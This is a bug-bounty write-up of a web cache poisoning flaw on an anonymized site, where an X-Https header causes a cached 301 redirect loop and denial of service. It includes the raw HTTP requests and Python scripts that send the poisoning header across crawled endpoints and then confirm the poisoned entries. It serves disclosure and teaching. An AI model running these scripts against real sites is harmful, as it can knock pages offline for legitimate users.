From Minor Bug to Major DoS: My Journey with Web Cache Poisoning
It started with a routine exploration of the samlsso endpoint on a [redacted] platform. At first, it seemed like a typical authentication endpoint, but a small anomaly hinted at something deeper.
Disclaimer: The domain names used in this write-up are anonymized as redacted.com for privacy and security reasons.
The First Clue: Playing with samlsso
While testing, I discovered that the samlsso endpoint accepted an additional header called X-Https, which caused the server to issue a 301 redirect. Here’s the request I used to observe this behavior:
POST /samlsso/?cache=foobar HTTP/2
Host: www.redacted.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.redacted.com/account/details.html
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
X-Https: foobar
The server responded with:

HTTP/1.1 301 Moved Permanently
Location: https://www.redacted.com/samlsso?cache=foobar
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
The server’s behavior was clear: it issued a 301 redirect. On its own this wasn’t a vulnerability, since the response wasn’t cached, but it provided a clue that the server might also accept X-Https on cacheable endpoints.
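Before automating anything, a single endpoint can be checked by hand. The sketch below is a minimal reproduction of the check, assuming the anonymized www.redacted.com host and the same cache-buster value; it sends one GET with the X-Https header (the automation later in this post uses GET as well), skips redirect following, and prints the status and Location header so the 301 is visible directly.

import requests

# Hypothetical target on the anonymized domain, with a cache buster appended
url = "https://www.redacted.com/samlsso/?cache=foobar"

# Send a single request carrying the X-Https header; don't follow redirects
# so the raw 301 from the origin stays visible
response = requests.get(
    url,
    headers={"X-Https": "foobar"},
    allow_redirects=False,
    timeout=10,
)

print(response.status_code)              # expected: 301
print(response.headers.get("Location"))  # expected: https://www.redacted.com/samlsso?cache=foobar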
Building a Theory: Testing Cacheable Endpoints
To test my hypothesis, I needed to check cacheable endpoints for similar behavior. Instead of manual testing, I automated the process using a Python script. The list of URLs (crawled.txt) was generated using Burp Suite’s crawler, which mapped out all the accessible endpoints on the domain.
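The script expects one absolute URL per line. A crawled.txt exported from the crawler might look like this (the paths are illustrative, not the actual endpoints):

https://www.redacted.com/
https://www.redacted.com/account/details.html
https://www.redacted.com/samlsso/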
Here’s the script I used:
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.exceptions import TooManyRedirects, RequestException

# Load crawled endpoints and add a cache buster
with open("crawled.txt", "r") as f:
    endpoints = [url.strip() + "?cache=foobar" for url in f.readlines()]

vulnerable_endpoints = []

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0",
    "Accept": "*/*",
    "X-Https": "foobar"
}

# Create a session with max_redirects set to 5
session = requests.Session()
session.headers.update(headers)
session.max_redirects = 5

# Custom adapter to modify headers for redirects
class NoXHttpsRedirectAdapter(requests.adapters.HTTPAdapter):
    def send(self, request, **kwargs):
        # Check if the request has a previous response (redirect)
        response = super().send(request, **kwargs)
        # If we have a redirect, remove the 'X-Https' header
        if response.history:
            request.headers.pop('X-Https', None)
        return response

# Mount the adapter to the session
adapter = NoXHttpsRedirectAdapter()
session.mount('http://', adapter)
session.mount('https://', adapter)

def check_endpoint(endpoint):
    try:
        # Use the session to send the GET request
        response = session.get(endpoint, timeout=10)
    except TooManyRedirects:
        # Hitting the max redirect limit means the endpoint keeps redirecting
        print(f"[VULNERABLE] Infinite redirect detected: {endpoint}")
        return endpoint
    except RequestException as e:
        print(f"[ERROR] Failed to check {endpoint}: {e}")
        return None

# Use ThreadPoolExecutor to check endpoints concurrently
with ThreadPoolExecutor(max_workers=10) as executor:
    future_to_endpoint = {executor.submit(check_endpoint, endpoint): endpoint for endpoint in endpoints}
    for future in as_completed(future_to_endpoint):
        result = future.result()
        if result:
            vulnerable_endpoints.append(result)

# Save the results
with open("poisoned_endpoints.txt", "w") as f:
    for url in vulnerable_endpoints:
        f.write(url + "\n")
How the Script Works
- Loading and Preparing Endpoints: The script reads URLs from crawled.txt and appends ?cache=foobar as a cache buster so that live, unparameterized URLs aren’t poisoned during testing.
- Sending Concurrent Requests: Using ThreadPoolExecutor, the script sends requests carrying the X-Https header concurrently, making the process much faster.
- Checking Redirects: Any endpoint that exceeds the session’s redirect limit raises TooManyRedirects, which signals a poisoned cache entry causing infinite redirects (see the verification sketch after this list).
- Saving Results: Vulnerable URLs are saved in poisoned_endpoints.txt.
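To confirm that the cache itself is poisoned, and not just that the endpoint redirects while the X-Https header is present, each flagged URL can be re-requested from a clean client without the header. Here is a minimal sketch, assuming the poisoned_endpoints.txt output from the script above; the cache-related headers it prints (Age, X-Cache) vary by CDN and are only there for inspection.

import requests

# Re-check each flagged URL without the X-Https header to see whether the
# 301 is now served to ordinary visitors (i.e., the cache entry is poisoned)
with open("poisoned_endpoints.txt", "r") as f:
    flagged = [line.strip() for line in f if line.strip()]

for url in flagged:
    # No custom headers, no redirect following: just observe what the cache returns
    response = requests.get(url, allow_redirects=False, timeout=10)
    print(
        url,
        response.status_code,
        response.headers.get("Location"),
        response.headers.get("Age"),      # cache header names differ per CDN
        response.headers.get("X-Cache"),
    )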
Jackpot: Finding Vulnerable Endpoints
Within minutes, the script identified several poisoned endpoints. Opening these URLs in a browser revealed the infinite redirect issue in action. The browser would continuously loop, unable to load the page, effectively causing a Denial of Service (DoS).
Triaged by HackerOne
After I responsibly disclosed the issue, it was quickly triaged and confirmed by the security team on HackerOne. Below is a screenshot of the triaged report for reference:
Conclusion: From Small Clue to Major Vulnerability
This experience demonstrated how a minor clue, like a 301 redirect, can lead to discovering a critical vulnerability capable of mass DoS on the root domain. By exploiting web cache poisoning, I was able to identify multiple endpoints that could disrupt service for legitimate users.
Responsible disclosure ensured these vulnerabilities were patched without causing harm. For bug hunters, it’s a reminder that persistence and creative thinking can turn small hints into major finds.